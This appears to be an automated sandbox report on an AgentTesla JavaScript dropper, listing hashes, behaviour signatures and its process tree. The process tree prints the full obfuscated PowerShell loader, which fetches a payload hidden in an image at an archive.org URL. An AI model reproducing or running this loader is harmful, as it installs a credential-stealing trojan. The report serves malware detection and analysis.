Overview

overview

10

Static

static

1

INQUIRY#46...G24.js

windows7-x64

10

INQUIRY#46...G24.js

windows10-2004-x64

10

Analysis

  • max time kernel
    95s
  • max time network
    100s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/08/2024, 05:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    INQUIRY#46789-AUG24.js

  • Size

    616KB

  • MD5

    c32b30698d7c4e0f9d674e7809f10fb6

  • SHA1

    522077297fecddea89006116313701d923b65000

  • SHA256

    3992784614112361e6f52a59f99526a834a1a471eb74b708605d6d90188848af

  • SHA512

    0d5fade8b6174054f062ba801eff0b516d99276afd67013aa691ac027933abd4d60bf73c1a253864ffbe40a0141cf7acd6ff95fb0097d99075af5f13bc9fd459

  • SSDEEP

    12288:G2/iUeEUN6ULhg/ndgF+xjvvT2ZBxoQ3MhzxVDYzayq8Q5CJY0smYkBQPU7H8C6X:G2XFPj6GmEgpj6AZs

Score
10/10
agentteslacredential_accessdiscoveryexecutionkeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\INQUIRY#46789-AUG24.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⨢ ˛ ⓡ ∮ ⬝Bp⨢ ˛ ⓡ ∮ ⬝G0⨢ ˛ ⓡ ∮ ⬝YQBn⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝VQBy⨢ ˛ ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝9⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝JwBo⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bw⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝Og⨢ ˛ ⓡ ∮ ⬝v⨢ ˛ ⓡ ∮ ⬝C8⨢ ˛ ⓡ ∮ ⬝aQBh⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝M⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝x⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝M⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝2⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝dQBz⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝YQBy⨢ ˛ ⓡ ∮ ⬝GM⨢ ˛ ⓡ ∮ ⬝a⨢ ˛ ⓡ ∮ ⬝Bp⨢ ˛ ⓡ ∮ ⬝HY⨢ ˛ ⓡ ∮ ⬝ZQ⨢ ˛ ⓡ ∮ ⬝u⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝cgBn⨢ ˛ ⓡ ∮ ⬝C8⨢ ˛ ⓡ ∮ ⬝MQ⨢ ˛ ⓡ ∮ ⬝w⨢ ˛ ⓡ ∮ ⬝C8⨢ ˛ ⓡ ∮ ⬝aQB0⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝bQBz⨢ ˛ ⓡ ∮ ⬝C8⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bo⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝bwB0⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝Xw⨢ ˛ ⓡ ∮ ⬝y⨢ ˛ ⓡ ∮ ⬝D⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝Mg⨢ ˛ ⓡ ∮ ⬝0⨢ ˛ ⓡ ∮ ⬝D⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝Nw⨢ ˛ ⓡ ∮ ⬝v⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝ZQBh⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝a⨢ ˛ ⓡ ∮ ⬝Bu⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝agBw⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝Jw⨢ ˛ ⓡ ∮ ⬝7⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝dwBl⨢ ˛ ⓡ ∮ ⬝GI⨢ ˛ ⓡ ∮ ⬝QwBs⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝ZQBu⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝9⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝TgBl⨢ ˛ ⓡ ∮ ⬝Hc⨢ ˛ ⓡ ∮ ⬝LQBP⨢ ˛ ⓡ ∮ ⬝GI⨢ ˛ ⓡ ∮ ⬝agBl⨢ ˛ ⓡ ∮ ⬝GM⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝FM⨢ ˛ ⓡ ∮ ⬝eQBz⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝ZQBt⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝TgBl⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝LgBX⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝YgBD⨢ ˛ ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝aQBl⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝7⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝aQBt⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝ZwBl⨢ ˛ ⓡ ∮ ⬝EI⨢ ˛ ⓡ ∮ ⬝eQB0⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝cw⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝D0⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝k⨢ ˛ ⓡ ∮ ⬝Hc⨢ ˛ ⓡ ∮ ⬝ZQBi⨢ ˛ ⓡ ∮ ⬝EM⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝Bp⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝bgB0⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝R⨢ ˛ ⓡ ∮ ⬝Bv⨢ ˛ ⓡ ∮ ⬝Hc⨢ ˛ ⓡ ∮ ⬝bgBs⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝YQBk⨢ ˛ ⓡ ∮ ⬝EQ⨢ ˛ ⓡ ∮ ⬝YQB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝K⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝k⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝bQBh⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝ZQBV⨢ ˛ ⓡ ∮ ⬝HI⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝p⨢ ˛ ⓡ ∮ ⬝Ds⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bp⨢ ˛ ⓡ ∮ ⬝G0⨢ ˛ ⓡ ∮ ⬝YQBn⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝V⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝Hg⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝D0⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝Bb⨢ ˛ ⓡ ∮ ⬝FM⨢ ˛ ⓡ ∮ ⬝eQBz⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝ZQBt⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝V⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝Hg⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝u⨢ ˛ ⓡ ∮ ⬝EU⨢ ˛ ⓡ ∮ ⬝bgBj⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bp⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝ZwBd⨢ ˛ ⓡ ∮ ⬝Do⨢ ˛ ⓡ ∮ ⬝OgBV⨢ ˛ ⓡ ∮ ⬝FQ⨢ ˛ ⓡ ∮ ⬝Rg⨢ ˛ ⓡ ∮ ⬝4⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝RwBl⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝UwB0⨢ ˛ ⓡ ∮ ⬝HI⨢ ˛ ⓡ ∮ ⬝aQBu⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝K⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝k⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝bQBh⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝ZQBC⨢ ˛ ⓡ ∮ ⬝Hk⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝KQ⨢ ˛ ⓡ ∮ ⬝7⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝cwB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cgB0⨢ ˛ ⓡ ∮ ⬝EY⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝Bh⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝9⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝Jw⨢ ˛ ⓡ ∮ ⬝8⨢ ˛ ⓡ ∮ ⬝Dw⨢ ˛ ⓡ ∮ ⬝QgBB⨢ ˛ ⓡ ∮ ⬝FM⨢ ˛ ⓡ ∮ ⬝RQ⨢ ˛ ⓡ ∮ ⬝2⨢ ˛ ⓡ ∮ ⬝DQ⨢ ˛ ⓡ ∮ ⬝XwBT⨢ ˛ ⓡ ∮ ⬝FQ⨢ ˛ ⓡ ∮ ⬝QQBS⨢ ˛ ⓡ ∮ ⬝FQ⨢ ˛ ⓡ ∮ ⬝Pg⨢ ˛ ⓡ ∮ ⬝+⨢ ˛ ⓡ ∮ ⬝Cc⨢ ˛ ⓡ ∮ ⬝Ow⨢ ˛ ⓡ ∮ ⬝k⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝EY⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝Bh⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝9⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝Jw⨢ ˛ ⓡ ∮ ⬝8⨢ ˛ ⓡ ∮ ⬝Dw⨢ ˛ ⓡ ∮ ⬝QgBB⨢ ˛ ⓡ ∮ ⬝FM⨢ ˛ ⓡ ∮ ⬝RQ⨢ ˛ ⓡ ∮ ⬝2⨢ ˛ ⓡ ∮ ⬝DQ⨢ ˛ ⓡ ∮ ⬝XwBF⨢ ˛ ⓡ ∮ ⬝E4⨢ ˛ ⓡ ∮ ⬝R⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝+⨢ ˛ ⓡ ∮ ⬝D4⨢ ˛ ⓡ ∮ ⬝Jw⨢ ˛ ⓡ ∮ ⬝7⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝cwB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cgB0⨢ ˛ ⓡ ∮ ⬝Ek⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝e⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝D0⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝k⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝bQBh⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝ZQBU⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝e⨢ ˛ ⓡ ∮ ⬝B0⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝SQBu⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝ZQB4⨢ ˛ ⓡ ∮ ⬝E8⨢ ˛ ⓡ ∮ ⬝Zg⨢ ˛ ⓡ ∮ ⬝o⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝cwB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cgB0⨢ ˛ ⓡ ∮ ⬝EY⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝Bh⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝KQ⨢ ˛ ⓡ ∮ ⬝7⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝ZQBu⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝SQBu⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝ZQB4⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝PQ⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝aQBt⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝ZwBl⨢ ˛ ⓡ ∮ ⬝FQ⨢ ˛ ⓡ ∮ ⬝ZQB4⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝LgBJ⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝Hg⨢ ˛ ⓡ ∮ ⬝TwBm⨢ ˛ ⓡ ∮ ⬝Cg⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝BG⨢ ˛ ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝YQBn⨢ ˛ ⓡ ∮ ⬝Ck⨢ ˛ ⓡ ∮ ⬝Ow⨢ ˛ ⓡ ∮ ⬝k⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bh⨢ ˛ ⓡ ∮ ⬝HI⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝BJ⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝Hg⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝t⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝ZQ⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝D⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝t⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝BJ⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝Hg⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝t⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝cwB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cgB0⨢ ˛ ⓡ ∮ ⬝Ek⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝e⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝7⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝cwB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cgB0⨢ ˛ ⓡ ∮ ⬝Ek⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝e⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝Cs⨢ ˛ ⓡ ∮ ⬝PQ⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝cwB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cgB0⨢ ˛ ⓡ ∮ ⬝EY⨢ ˛ ⓡ ∮ ⬝b⨢ ˛ ⓡ ∮ ⬝Bh⨢ ˛ ⓡ ∮ ⬝Gc⨢ ˛ ⓡ ∮ ⬝LgBM⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝bgBn⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝a⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝7⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝YgBh⨢ ˛ ⓡ ∮ ⬝HM⨢ ˛ ⓡ ∮ ⬝ZQ⨢ ˛ ⓡ ∮ ⬝2⨢ ˛ ⓡ ∮ ⬝DQ⨢ ˛ ⓡ ∮ ⬝T⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝ZwB0⨢ ˛ ⓡ ∮ ⬝Gg⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝9⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝BJ⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Z⨢ ˛ ⓡ ∮ ⬝Bl⨢ ˛ ⓡ ∮ ⬝Hg⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝t⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bz⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝YQBy⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝SQBu⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝ZQB4⨢ ˛ ⓡ ∮ ⬝Ds⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bi⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cwBl⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝N⨢ ˛ ⓡ ∮ ⬝BD⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝bQBt⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝PQ⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝aQBt⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝ZwBl⨢ ˛ ⓡ ∮ ⬝FQ⨢ ˛ ⓡ ∮ ⬝ZQB4⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝LgBT⨢ ˛ ⓡ ∮ ⬝HU⨢ ˛ ⓡ ∮ ⬝YgBz⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝cgBp⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝Zw⨢ ˛ ⓡ ∮ ⬝o⨢ ˛ ⓡ ∮ ⬝CQ⨢ ˛ ⓡ ∮ ⬝cwB0⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cgB0⨢ ˛ ⓡ ∮ ⬝Ek⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝e⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝s⨢ ˛ ⓡ ∮ ⬝C⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bi⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cwBl⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝N⨢ ˛ ⓡ ∮ ⬝BM⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝bgBn⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝a⨢ ˛ ⓡ ∮ ⬝⨢ ˛ ⓡ ∮ ⬝p⨢ ˛ ⓡ ∮ ⬝Ds⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bj⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝bQBt⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝EI⨢ ˛ ⓡ ∮ ⬝eQB0⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝cw⨢ ˛ ⓡ ∮ ⬝g⨢ ˛ ⓡ ∮ ⬝D0⨢ ˛ ⓡ ∮ ⬝I⨢ ˛ ⓡ ∮ ⬝Bb⨢ ˛ ⓡ ∮ ⬝FM⨢ ˛ ⓡ ∮ ⬝eQBz⨢ ˛ ⓡ ∮ ⬝HQ⨢ ˛ ⓡ ∮ ⬝ZQBt⨢ ˛ ⓡ ∮ ⬝C4⨢ ˛ ⓡ ∮ ⬝QwBv⨢ ˛ ⓡ ∮ ⬝G4⨢ ˛ ⓡ ∮ ⬝dgBl⨢ ˛ ⓡ ∮ ⬝HI⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝Bd⨢ ˛ ⓡ ∮ ⬝Do⨢ ˛ ⓡ ∮ ⬝OgBG⨢ ˛ ⓡ ∮ ⬝HI⨢ ˛ ⓡ ∮ ⬝bwBt⨢ ˛ ⓡ ∮ ⬝EI⨢ ˛ ⓡ ∮ ⬝YQBz⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝Ng⨢ ˛ ⓡ ∮ ⬝0⨢ ˛ ⓡ ∮ ⬝FM⨢ ˛ ⓡ ∮ ⬝d⨢ ˛ ⓡ ∮ ⬝By⨢ ˛ ⓡ ∮ ⬝Gk⨢ ˛ ⓡ ∮ ⬝bgBn⨢ ˛ ⓡ ∮ ⬝Cg⨢ ˛ ⓡ ∮ ⬝J⨢ ˛ ⓡ ∮ ⬝Bi⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝cwBl⨢ ˛ ⓡ ∮ ⬝DY⨢ ˛ ⓡ ∮ ⬝N⨢ ˛ ⓡ ∮ ⬝BD⨢ ˛ ⓡ ∮ ⬝G8⨢ ˛ ⓡ ∮ ⬝bQBt⨢ ˛ ⓡ ∮ ⬝GE⨢ ˛ ⓡ ∮ ⬝bgBk⨢ ˛ ⓡ ∮ ⬝Ck⨢ ˛ ⓡ ∮ ⬝Ow⨢ ˛ ⓡ ∮ ⬝k⨢ ˛ ⓡ ∮ ⬝Gw⨢ ˛ ⓡ ∮ ⬝bwBh⨢ ˛ ⓡ ∮ ⬝GQ⨢ ˛ ⓡ ∮ ⬝ZQBk⨢ ˛ ⓡ ∮ ⬝EE⨢ ˛ ⓡ ∮ ⬝cwBz⨢ ˛ ⓡ ∮ ⬝GU⨢ ˛ ⓡ ∮ ⬝bQBi⨢ ˛ 